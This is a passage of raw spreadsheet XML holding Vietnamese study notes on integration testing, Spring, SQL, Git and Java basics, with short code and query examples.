Loại kiểm thử: Có thể là Black-box testing (kiểm thử hộp đen - chỉ quan tâm đầu vào/đầu ra, không cần biết mã nguồn bên trong), White-box testing (nếu kiểm thử viên có kiến thức về cấu trúc bên trong các module tích hợp) hoặc Gray-box testing (kết hợp cả hai).
Thời điểm: Thực hiện sau khi các unit test đã hoàn thành và các module đã được coi là hoạt động đúng đắn riêng lẻ.Ví dụ về Integration Test:
Giả sử bạn có một ứng dụng web với:
UserController: Xử lý các yêu cầu liên quan đến người dùng.
UserService: Chứa logic nghiệp vụ liên quan đến người dùng (ví dụ: tạo, lấy, cập nhật người dùng).
UserRepository: Tương tác với cơ sở dữ liệu để lưu trữ và truy xuất dữ liệu người dùng.
Một integration test có thể kiểm tra luồng từ UserController -&gt; UserService -&gt; UserRepository -&gt; Database:
Kịch bản: Gửi một yêu cầu HTTP POST đến /users với dữ liệu người dùng mới.
Kiểm tra:
UserController nhận yêu cầu và gọi UserService.
UserService xử lý logic nghiệp vụ và gọi UserRepository.
UserRepository lưu dữ liệu vào cơ sở dữ liệu.
Phản hồi HTTP từ UserController là 201 Created và dữ liệu người dùng được trả về chính xác.
Sau đó: Truy vấn trực tiếp cơ sở dữ liệu để xác nhận rằng người dùng đã thực sự được lưu trữ đúng cách.
Đây là một ví dụ đơn giản về một integration test (sử dụng Spring Boot Test với H2 in-memory database để dễ dàng kiểm thử mà không cần DB thật):</t>
  </si>
  <si>
    <t>// Lớp User.java (Model)
public class User {
    private Long id;
    private String username;
    private String email;
    // Getters and Setters, Constructors
}
// Lớp UserRepository.java (Tương tác DB)
import org.springframework.data.jpa.repository.JpaRepository;
public interface UserRepository extends JpaRepository&lt;User, Long&gt; {}
// Lớp UserService.java (Business Logic)
import org.springframework.stereotype.Service;
import org.springframework.beans.factory.annotation.Autowired;
@Service
public class UserService {
    @Autowired
    private UserRepository userRepository;
    public User createUser(User user) {
        // Có thể có thêm validation logic ở đây
        return userRepository.save(user);
    }
    public User findUserByUsername(String username) {
        return userRepository.findByUsername(username); // Giả sử có method này
    }
}
// Lớp UserController.java (REST API Endpoint)
import org.springframework.web.bind.annotation.*;
import org.springframework.http.HttpStatus;
@RestController
@RequestMapping("/api/users")
public class UserController {
    @Autowired
    private UserService userService;
    @PostMapping
    @ResponseStatus(HttpStatus.CREATED)
    public User createUser(@RequestBody User user) {
        return userService.createUser(user);
    }
    @GetMapping("/{username}")
    public User getUserByUsername(@PathVariable String username) {
        return userService.findUserByUsername(username);
    }
}</t>
  </si>
  <si>
    <t>SpringBootTest
AutoConfigureMockMvc
public class UserIntegrationTest {
    @Autowired
    private MockMvc mockMvc; // Dùng để gọi các API endpoint
    @Autowired
    private UserRepository userRepository; // Dùng để kiểm tra trực tiếp DB
    @Autowired
    private ObjectMapper objectMapper; // Dùng để chuyển đổi object thành JSON
    @Test
    void testCreateUserFlow() throws Exception {
        User newUser = new User();
        newUser.setUsername("testuser");
        newUser.setEmail("test@example.com");
        // Gửi request POST đến API
        mockMvc.perform(post("/api/users")
                .contentType(MediaType.APPLICATION_JSON)
                .content(objectMapper.writeValueAsString(newUser)))
                .andExpect(status().isCreated()) // Kiểm tra status code là 201
                .andExpect(jsonPath("$.username").value("testuser")) // Kiểm tra username trả về
                .andExpect(jsonPath("$.email").value("test@example.com")); // Kiểm tra email trả về
        // Kiểm tra xem dữ liệu đã được lưu vào database chưa
        User savedUser = userRepository.findByUsername("testuser");
        // Kiểm tra xem user có tồn tại và đúng thông tin không
        assertNotNull(savedUser);
        assertEquals("test@example.com", savedUser.getEmail());
    }
}</t>
  </si>
  <si>
    <t>Bean?</t>
  </si>
  <si>
    <t>Bean là gì? Trong Spring, một bean là một đối tượng được khởi tạo, cấu hình và quản lý bởi Spring Container. Thường là các class đại diện cho dịch vụ hoặc thành phần trong ứng dụng.</t>
  </si>
  <si>
    <t xml:space="preserve"> Trong ngữ cảnh Java — đặc biệt là khi dùng Spring Framework — thứ quản lý bean chính là Spring Container (hay còn gọi là ApplicationContext).</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Phân biệt </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>WHERE</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>HAVING</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> trong SQL.SELECT
    CustomerID,
    SUM(Amount) AS TotalAmount
FROM
    Orders
GROUP BY
    CustomerID
HAVING
    SUM(Amount) &gt; 300;</t>
    </r>
  </si>
  <si>
    <t>WHERE: Được sử dụng để lọc các hàng (rows) trước khi nhóm (grouping) dữ liệu. Nó không thể sử dụng với các hàm tổng hợp (aggregate functions) như COUNT(), SUM(), AVG().
HAVING: Được sử dụng để lọc các nhóm (groups) dữ liệu sau khi các hàm tổng hợp đã được áp dụng. Nó luôn đi kèm với GROUP BY.
Ví dụ:
SELECT Department, COUNT(EmployeeID) FROM Employees WHERE Age &gt; 25 GROUP BY Department HAVING COUNT(EmployeeID) &gt; 5; (Lọc nhân viên trên 25 tuổi trước, sau đó nhóm theo phòng ban, rồi lọc những phòng ban có hơn 5 nhân viên).Sự khác biệt chính giữa WHERE và HAVING:
WHERE: Lọc các hàng (rows) riêng lẻ. Không thể sử dụng các hàm tổng hợp (như SUM(), COUNT(), AVG(), MAX(), MIN()) trong mệnh đề WHERE trực tiếp trên các cột được tổng hợp.
HAVING: Lọc các nhóm (groups). Luôn được sử dụng với GROUP BY và thường chứa các hàm tổng hợp trong điều kiện lọc.</t>
  </si>
  <si>
    <t>Giải thích các loại JOINs phổ biến trong SQL: INNER JOIN, LEFT JOIN, RIGHT JOIN, FULL OUTER JOIN.</t>
  </si>
  <si>
    <t>INNER JOIN: Trả về các hàng khi có ít nhất một sự trùng khớp ở cả hai bảng. (Chỉ lấy phần giao nhau).
LEFT JOIN (hoặc LEFT OUTER JOIN): Trả về tất cả các hàng từ bảng bên trái, và các hàng trùng khớp từ bảng bên phải. Nếu không có sự trùng khớp ở bảng bên phải, các cột từ bảng bên phải sẽ có giá trị NULL.
RIGHT JOIN (hoặc RIGHT OUTER JOIN): Trả về tất cả các hàng từ bảng bên phải, và các hàng trùng khớp từ bảng bên trái. Nếu không có sự trùng khớp ở bảng bên trái, các cột từ bảng bên trái sẽ có giá trị NULL.
FULL OUTER JOIN: Trả về tất cả các hàng khi có sự trùng khớp ở một trong hai bảng (union của Left Join và Right Join). Nếu không có sự trùng khớp, các cột tương ứng sẽ là NULL. (Ít được sử dụng trong MySQL, thay vào đó là UNION của LEFT JOIN và RIGHT JOIN).</t>
  </si>
  <si>
    <t>Ví dụ : Giả sử bạn có hai bảng Orders (OrderID, CustomerID, OrderDate) và Customers (CustomerID, CustomerName). Viết câu lệnh SQL để lấy CustomerName và OrderID cho tất cả các đơn hàng.</t>
  </si>
  <si>
    <t>SELECT C.CustomerName, O.OrderID
FROM Customers C
INNER JOIN Orders O ON C.CustomerID = O.CustomerID;(Hoặc LEFT JOIN nếu bạn muốn hiển thị cả những khách hàng chưa có đơn hàng nào, với OrderID là NULL).</t>
  </si>
  <si>
    <t>Viết câu lệnh SQL để tính tổng lương của nhân viên theo từng phòng ban (Department).</t>
  </si>
  <si>
    <t>SELECT Department, SUM(Salary) AS TotalSalary
FROM Employees
GROUP BY Department;</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Phân biệt </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>ORDER BY</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>GROUP BY</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>GROUP BY: Được sử dụng để nhóm các hàng có giá trị giống nhau trong một hoặc nhiều cột thành các nhóm tóm tắt. Các hàm tổng hợp thường được sử dụng với GROUP BY.
ORDER BY: Được sử dụng để sắp xếp tập hợp kết quả của một truy vấn theo thứ tự tăng dần (ASC) hoặc giảm dần (DESC) dựa trên một hoặc nhiều cột.
Thứ tự thực hiện: GROUP BY được xử lý trước ORDER BY.</t>
  </si>
  <si>
    <t>Tìm hiểu về transactions</t>
  </si>
  <si>
    <t>Một transaction là một tập hợp các câu lệnh SQL (INSERT, UPDATE, DELETE...) được thực hiện như một đơn vị công việc duy nhất. Nó tuân theo nguyên tắc ACID.  Tính nguyên tử: hoặc tất cả câu lệnh thực hiện thành công, hoặc không có gì thay đổi.     Tính nhất quán: dữ liệu luôn ở trạng thái hợp lệ trước và sau transaction.    Tính độc lập: các transaction không ảnh hưởng lẫn nhau khi chạy đồng thời.    Tính bền vững: khi đã commit, dữ liệu sẽ tồn tại ngay cả khi hệ thống gặp sự cố.</t>
  </si>
  <si>
    <t>BEGIN TRANSACTION: Bắt đầu một TRANSACTION
COMMIT: Lưu các thay đổi vào cơ sở dữ liệu
ROLLBACK: Hoàn tác các thay đổi nếu có lỗi
SAVEPOINT: Tạo điểm đánh dấu để ROLLBACK một phần
SET TRANSACTION: Thiết lập thuộc tính cho TRANSACTION (ví dụ: chỉ đọc)</t>
  </si>
  <si>
    <t>BEGIN TRANSACTION;
UPDATE Accounts SET Balance = Balance - 100 WHERE AccountID = 'A';
UPDATE Accounts SET Balance = Balance + 100 WHERE AccountID = 'B';
COMMIT;</t>
  </si>
  <si>
    <t>Đánh index và tìm kiếm trong sql</t>
  </si>
  <si>
    <t xml:space="preserve">Ưu điểm của Index
- Tăng tốc độ truy vấn: Index giúp hệ quản trị cơ sở dữ liệu (DBMS) tìm kiếm dữ liệu nhanh hơn, đặc biệt với các bảng lớn.
- Cải thiện hiệu năng SELECT: Các câu lệnh SELECT có điều kiện (WHERE, JOIN, ORDER BY, GROUP BY) sẽ chạy nhanh hơn khi có index phù hợp.
- Đảm bảo tính duy nhất: Index loại UNIQUE giúp đảm bảo không có dữ liệu trùng lặp trong cột được đánh chỉ mục.
- Hỗ trợ kiểm tra ràng buộc: Index trên khóa chính và khóa ngoại giúp kiểm tra nhanh tính toàn vẹn dữ liệu.
- Tối ưu hóa tìm kiếm toàn văn bản: Với Full-text Index, bạn có thể tìm kiếm từ khóa trong chuỗi văn bản hiệu quả hơn.
</t>
  </si>
  <si>
    <t xml:space="preserve"> Nhược điểm của Index
- Làm chậm thao tác ghi dữ liệu: Các lệnh INSERT, UPDATE, DELETE sẽ chậm hơn vì DBMS phải cập nhật lại index sau mỗi thay đổi.
- Chiếm dung lượng bộ nhớ: Mỗi index đều chiếm thêm không gian lưu trữ, đặc biệt khi có nhiều index trên một bảng.
- Không hiệu quả với bảng nhỏ: Với bảng có ít bản ghi, việc đánh index có thể không mang lại lợi ích rõ rệt.
- Không phù hợp với cột ít giá trị phân biệt: Ví dụ như cột gender chỉ có "Nam" và "Nữ" thì index sẽ không cải thiện tốc độ truy vấn nhiều.
- Phức tạp khi thiết kế: Việc chọn đúng cột để đánh index đòi hỏi hiểu rõ về dữ liệu và cách truy vấn thực tế.</t>
  </si>
  <si>
    <t>Mẹo sử dụng Index hiệu quả
- Chỉ đánh index trên các cột thường xuyên được dùng trong điều kiện truy vấn (WHERE, JOIN, ORDER BY).
- Tránh đánh index trên các bảng nhỏ hoặc cột thường xuyên bị cập nhật.
- Sử dụng EXPLAIN để phân tích hiệu năng truy vấn và kiểm tra xem index có được sử dụng hay không.</t>
  </si>
  <si>
    <t>CREATE TABLE Customers (
    CustomerID INT PRIMARY KEY,
    Name VARCHAR(100),
    Email VARCHAR(100),
    City VARCHAR(50)
);</t>
  </si>
  <si>
    <t>Bạn thường xuyên sắp xếp theo OrderDate, nên tạo index:CREATE INDEX idx_orderdate ON Orders(OrderDate);Truy vấn như: SELECT * FROM Orders ORDER BY OrderDate DESC; sẽ được tôi ưu hóa.</t>
  </si>
  <si>
    <t xml:space="preserve">CREATE TABLE Products (
    ProductID INT PRIMARY KEY,
    CategoryID INT,
    Price DECIMAL(10,2)
);Bạn thường truy vấn theo cả CategoryID và Price, nên tạo index kết hợp: CREATE INDEX idx_category_price ON Products(CategoryID, Price); Truy vấn như: SELECT * FROM Products WHERE CategoryID = 3 AND Price &lt; 100;sẽ chạy nhanh hơn. </t>
  </si>
  <si>
    <t>Các bước push code lên git</t>
  </si>
  <si>
    <t>Các bước nhanh gọn để ghi nhớ:
cd /duong/dan/den/du_an_cua_ban
git init
(Tạo hoặc chỉnh sửa tệp .gitignore)
git add .
git commit -m "Initial commit"
(Tạo kho lưu trữ rỗng trên GitHub/GitLab/Bitbucket và sao chép URL)
git remote add origin URL_KHO_LUU_TRU_CUA_BAN
git push -u origin main (hoặc master)</t>
  </si>
  <si>
    <t>phân biệt git merge và git rebase</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Cả </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>git merge</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> và </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>git rebase</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> đều là các lệnh được sử dụng để tích hợp các thay đổi từ một nhánh này vào một nhánh khác trong Git. Tuy nhiên, chúng thực hiện việc này theo những cách rất khác nhau, dẫn đến lịch sử commit khác nhau và có những ưu nhược điểm riêng.</t>
    </r>
  </si>
  <si>
    <t>git merge</t>
  </si>
  <si>
    <t>Khái niệm: git merge là cách phổ biến và đơn giản nhất để tích hợp các thay đổi. Nó tạo ra một "merge commit" mới, có hai hoặc nhiều commit cha, ghi lại quá trình tích hợp.
Cách hoạt động:
Khi bạn merge nhánh feature vào main, Git sẽ tìm điểm chung gần nhất giữa hai nhánh (common ancestor). Sau đó, nó tạo một commit mới (merge commit) mà chứa tất cả các thay đổi từ cả hai nhánh, đồng thời ghi lại sự kiện tích hợp này.Trong đó F là một merge commit mới, có C và E là các commit cha của nó.</t>
  </si>
  <si>
    <t>Git Rebase</t>
  </si>
  <si>
    <t>Khái niệm: git rebase là một cách thay thế để tích hợp các thay đổi. Thay vì tạo một merge commit, rebase sẽ di chuyển hoặc viết lại một chuỗi commit để chúng xuất hiện sau commit cuối cùng của nhánh đích. Nó tạo ra một lịch sử commit tuyến tính hơn (thẳng hàng).
Cách hoạt động:
Khi bạn rebase nhánh feature lên nhánh main, Git sẽ:
Tìm điểm chung gần nhất giữa feature và main.
Lưu trữ các thay đổi được giới thiệu bởi từng commit trên nhánh feature kể từ điểm chung đó.
"Reset" nhánh feature về điểm chung.
Áp dụng lại từng commit đã lưu trữ của feature lên trên commit cuối cùng của nhánh main theo thứ tự.Trong đó D' và E' là các commit mới được tạo ra (mặc dù nội dung thay đổi giống hệt D và E), nhưng chúng có commit cha là C (commit cuối cùng của main). Các commit D và E ban đầu trên nhánh feature sẽ bị loại bỏ.
Sau đó, để cập nhật nhánh main, bạn có thể thực hiện một "fast-forward merge" (chỉ di chuyển con trỏ main đến E'):</t>
  </si>
  <si>
    <t>các lỗi gây ra xung đột trong git</t>
  </si>
  <si>
    <t xml:space="preserve"> Hai người cùng sửa cùng một dòng trong cùng một file
Ví dụ:
// A sửa
System.out.println("Xin chào");
// B sửa
System.out.println("Chào bạn");
➡️ Khi merge lại, Git không biết dùng dòng nào, dẫn đến conflict.
🧽 2. Một người sửa, người khác xoá dòng đó
Ví dụ:
Bạn sửa nội dung dòng 20 trong main.js.
Người khác trên nhánh khác xoá dòng 20.
➡️ Git không biết nên giữ sửa hay xoá → gây xung đột.
📄 3. Cả hai thêm cùng tên file khác nội dung
Ví dụ:
Bạn tạo file LoginForm.jsx với nội dung A.
Người khác cũng tạo LoginForm.jsx nhưng nội dung B.
➡️ Khi merge, Git không biết chọn file nào → xung đột file mới.
🔀 4. Merge hoặc Rebase nhánh có thay đổi mâu thuẫn
Tình huống:
Bạn đang ở nhánh feature và rebase lên main.
main có sửa file config.json, feature cũng sửa file đó.
➡️ Lúc rebase, Git sẽ cố gắng phát lại commit của bạn trên main, nếu có xung đột → báo lỗi.
🔃 5. Merge/Rebase giữa các nhánh có commit lịch sử phức tạp
Khi bạn rebase một nhánh đã từng merge nhiều lần, hoặc có commit chồng chéo, Git có thể bị rối lịch sử và gây conflict, nhất là khi:
Sửa cùng file nhiều lần qua các nhánh khác nhau
Không rõ commit nào là mới nhất (do squash, cherry-pick...)
🧨 6. Sửa xung đột không đúng cách gây lỗi tiếp theo
Bạn giải quyết xung đột sai (giữ lại cả 2 phần mâu thuẫn)
Không xóa hết &lt;&lt;&lt;&lt;&lt;&lt;&lt;, =======, &gt;&gt;&gt;&gt;&gt;&gt;&gt;
➡️ Khi add file, Git không hiểu được → lỗi cú pháp hoặc lỗi logic.</t>
  </si>
  <si>
    <t>.gitignore là gì và tạo nó như thế nào nó nằm ở đâu trong thư mục</t>
  </si>
  <si>
    <t>.gitignore là một tệp đặc biệt trong hệ thống Git dùng để chỉ định các tệp và thư mục mà bạn không muốn Git theo dõi hoặc đưa vào kho lưu trữ. Nó cực kỳ hữu ích để giữ cho kho mã của bạn sạch sẽ, tránh chứa những thứ như:
- File cấu hình cá nhân (config.json, .env,…)
- File build (dist/, build/,…)
- File tạm thời hoặc cache (*.log, *.tmp, .DS_Store,…)</t>
  </si>
  <si>
    <t>.gitignore nằm ở đâu trong thư mục?
Bạn có thể đặt .gitignore ở thư mục gốc của repository — nơi chứa thư mục .git. Git sẽ tự động đọc tệp này mỗi khi bạn thực hiện các thao tác như git add hay git commit.
Nếu dự án có nhiều module hoặc phần riêng biệt, bạn cũng có thể tạo .gitignore riêng trong các thư mục con.</t>
  </si>
  <si>
    <t>example</t>
  </si>
  <si>
    <t> toán tử "instanceof" trong java?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Toán tử </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>instanceof</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> trong Java được dùng để kiểm tra xem một đối tượng có phải là một instance (thể hiện) của một lớp cụ thể hoặc một interface (giao diện) cụ thể hay không. Nó trả về giá trị boolean: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>true</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> nếu đúng và </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial Unicode MS"/>
        <charset val="134"/>
      </rPr>
      <t>false</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> nếu sai.</t>
    </r>
  </si>
  <si>
    <t>public class Main {
    public static void main(String[] args) {
        String str = "Hello";
        Integer num = 10;
        System.out.println("str instanceof String: " + (str instanceof String)); // true
        System.out.println("num instanceof Integer: " + (num instanceof Integer)); // true
        System.out.println("str instanceof Object: " + (str instanceof Object)); // true (vì String kế thừa từ Object)
        System.out.println("num instanceof String: " + (num instanceof String)); // false
    }
}</t>
  </si>
  <si>
    <t>Nếu một lớp con kế thừa từ một lớp cha, thì một đối tượng của lớp con cũng được coi là một thể hiện của lớp cha. &gt; class Animal {}
class Dog extends Animal {}
public class Main {
    public static void main(String[] args) {
        Dog myDog = new Dog();
        System.out.println("myDog instanceof Dog: " + (myDog instanceof Dog));     // true
        System.out.println("myDog instanceof Animal: " + (myDog instanceof Animal)); // true
        System.out.println("myDog instanceof Object: " + (myDog instanceof Object)); // true
    }
}</t>
  </si>
  <si>
    <t>có bao nhiêu kiểu dữ liệu trong java</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Trong Java, có tổng cộng </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>hai loại</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> kiểu dữ liệu chính, và mỗi loại lại bao gồm nhiều kiểu con khác nhau:</t>
    </r>
  </si>
  <si>
    <t>Kiểu dữ liệu nguyên thủy (Primitive Data Types): Long, int, byte, short ,float, char, boolean</t>
  </si>
  <si>
    <t>Kiểu dữ liệu tham chiếu (Reference Data Types):Các kiểu dữ liệu tham chiếu bao gồm:
Classes (Lớp): Bất kỳ lớp nào bạn định nghĩa (ví dụ: String, Scanner, ArrayList, hoặc lớp Person mà bạn tự tạo) đều là kiểu dữ liệu tham chiếu.
Interfaces (Giao diện): Các biến có thể được khai báo với kiểu interface.
Arrays (Mảng): Mảng trong Java, dù là mảng các kiểu nguyên thủy hay mảng các đối tượng, bản thân nó cũng là một đối tượng và do đó là một kiểu dữ liệu tham chiếu.String name = "Alice"; // 'name' là một tham chiếu đến đối tượng String "Alice"
ArrayList&lt;Integer&gt; numbers = new ArrayList&lt;&gt;(); // 'numbers' là một tham chiếu đến đối tượng ArrayList
int[] arr = new int[5]; // 'arr' là một tham chiếu đến đối tượng mảng int</t>
  </si>
  <si>
    <t>Hiểu ý nghĩa và mục đích sử dụng từ khóa "static" trong java?</t>
  </si>
  <si>
    <t>Từ khóa static được sử dụng để:
từ khóa static được sử dụng để xác định rằng một thành viên của lớp (biến hoặc phương thức) thuộc về chính lớp đó, thay vì đối tượng (instance) của lớp. Điều này có nghĩa là thành viên static có thể được truy cập mà không cần khởi tạo đối tượng.
Đại diện cho các thành phần thuộc về lớp chứ không phải đối tượng.
Tạo ra một bản sao duy nhất của biến hoặc phương thức được chia sẻ bởi tất cả các đối tượng của lớp.
Cho phép truy cập các thành phần mà không cần tạo đối tượng của lớp đó.
Hỗ trợ việc tạo các tiện ích chung (utility methods/classes) hoặc các hằng số.
Quản lý tài nguyên hoặc trạng thái cần được khởi tạo hoặc duy trì chỉ một lần cho toàn bộ ứng dụng.</t>
  </si>
  <si>
    <t>Dùng cho biến: class Student {
    String name;
    int rollNo;
    static String collegeName = "ABC University"; // Biến static
    public Student(String name, int rollNo) {
        this.name = name;
        this.rollNo = rollNo;
    }
    void display() {
        System.out.println(name + " " + rollNo + " " + collegeName);
    }
}
public class StaticVariableExample {
    public static void main(String args[]) {
        Student s1 = new Student("Alice", 101);
        Student s2 = new Student("Bob", 102);
        s1.display(); // Output: Alice 101 ABC University
        s2.display(); // Output: Bob 102 ABC University
        // Thay đổi giá trị của biến static qua tên lớp
        Student.collegeName = "XYZ College";
        Student s3 = new Student("Charlie", 103);
        s3.display(); // Output: Charlie 103 XYZ College
        s1.display(); // Output: Alice 101 XYZ College (Giá trị thay đổi cho tất cả các đối tượng)
    }
}</t>
  </si>
  <si>
    <t>Dùng cho method: class Calculator {
    static int add(int a, int b) {
        return a + b;
    }
    int subtract(int a, int b) { // Phương thức non-static
        return a - b;
    }
}
public class StaticMethodExample {
    public static void main(String args[]) {
        // Gọi phương thức static bằng tên lớp
        System.out.println("Sum: " + Calculator.add(10, 20)); // Output: Sum: 30
        // Để gọi phương thức non-static, cần tạo đối tượng
        Calculator calc = new Calculator();
        System.out.println("Difference: " + calc.subtract(20, 5)); // Output: Difference: 15
    }
}</t>
  </si>
  <si>
    <t>Hiểu ý nghĩa và mục đích sử dụng từ khóa "final" trong java? Định nghĩa hằng số: Khi áp dụng cho biến, giá trị của nó không thể thay đổi.
Ngăn chặn ghi đè: Khi áp dụng cho phương thức, các lớp con không thể thay đổi hành vi của phương thức đó.
Ngăn chặn kế thừa: Khi áp dụng cho lớp, không lớp nào có thể kế thừa từ lớp đó.
final giúp tăng cường tính an toàn, ổn định và hiệu suất trong các ứng dụng Java bằng cách áp đặt các quy tắc về khả năng thay đổi và khả năng mở rộng., từ khóa Final được sử dụng để chỉ định rằng một biến, một phương thức hoặc một lớp không thể thay đổi sau khi khởi tạo</t>
  </si>
  <si>
    <t>final Variables (Biến final): Biến final chỉ có thể được gán giá trị một lần duy nhất. Sau khi được gán, mọi nỗ lực gán lại giá trị cho nó sẽ gây ra lỗi biên dịch.class MyClass {
    final int INSTANCE_ID; // biến final non-static
    // Khối khởi tạo instance
    {
        INSTANCE_ID = 123;
    }
    final String NAME; // biến final non-static
    public MyClass(String name) {
        this.NAME = name; // Khởi tạo trong constructor
    }
    static final double PI; // biến final static
    static {
        PI = 3.14159; // Khởi tạo trong khối static
    }
}</t>
  </si>
  <si>
    <t>final Methods (Phương thức final) : Ngăn chặn các lớp con thay đổi hành vi đã được định nghĩa của phương thức này. class Parent {
    final void showMessage() { // Phương thức final
        System.out.println("This is a final method in Parent.");
    }
    void ordinaryMethod() {
        System.out.println("This is an ordinary method in Parent.");
    }
}
class Child extends Parent {
    // @Override // Lỗi biên dịch: không thể ghi đè phương thức final
    // void showMessage() {
    //     System.out.println("Trying to override final method.");
    // }
    @Override
    void ordinaryMethod() { // Hợp lệ: ghi đè phương thức non-final
        System.out.println("This is an overridden method in Child.");
    }
}
public class FinalMethodExample {
    public static void main(String[] args) {
        Child c = new Child();
        c.showMessage(); // Output: This is a final method in Parent.
        c.ordinaryMethod(); // Output: This is an overridden method in Child.
    }
}</t>
  </si>
  <si>
    <t>final Classes (Lớp final) : Khi một lớp được khai báo là final, nó không thể bị kế thừa bởi bất kỳ lớp nào khác. Ngăn chặn việc tạo ra các lớp con từ lớp này.final class ImmutablePoint {
    private final int x; // Biến final
    private final int y; // Biến final
    public ImmutablePoint(int x, int y) {
        this.x = x;
        this.y = y;
    }
    public int getX() { return x; }
    public int getY() { return y; }
    // Không có setter, đảm bảo tính bất biến
}
// class ColoredPoint extends ImmutablePoint { // Lỗi biên dịch: không thể kế thừa từ lớp final
//     private String color;
//     public ColoredPoint(int x, int y, String color) {
//         super(x, y);
//         this.color = color;
//     }
// }
public class FinalClassExample {
    public static void main(String[] args) {
        ImmutablePoint p = new ImmutablePoint(10, 20);
        System.out.println("Point: (" + p.getX() + ", " + p.getY() + ")");
    }
}</t>
  </si>
  <si>
    <t>Hiểu biết về String Immutable?</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Một String được gọi là "immutable" có nghĩa là </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>một khi nó được tạo ra, nội dung của nó không thể thay đổi được.</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> Bất kỳ thao tác nào dường như "thay đổi" một chuỗi thực chất đều tạo ra một chuỗi mới với nội dung đã được sửa đổi, trong khi chuỗi ban đầu vẫn giữ nguyên.</t>
    </r>
  </si>
  <si>
    <t>String s1 = "Hello";
String s2 = s1.concat(" World"); // concat() tạo ra một chuỗi MỚI
System.out.println(s1); // Output: Hello (s1 không thay đổi)
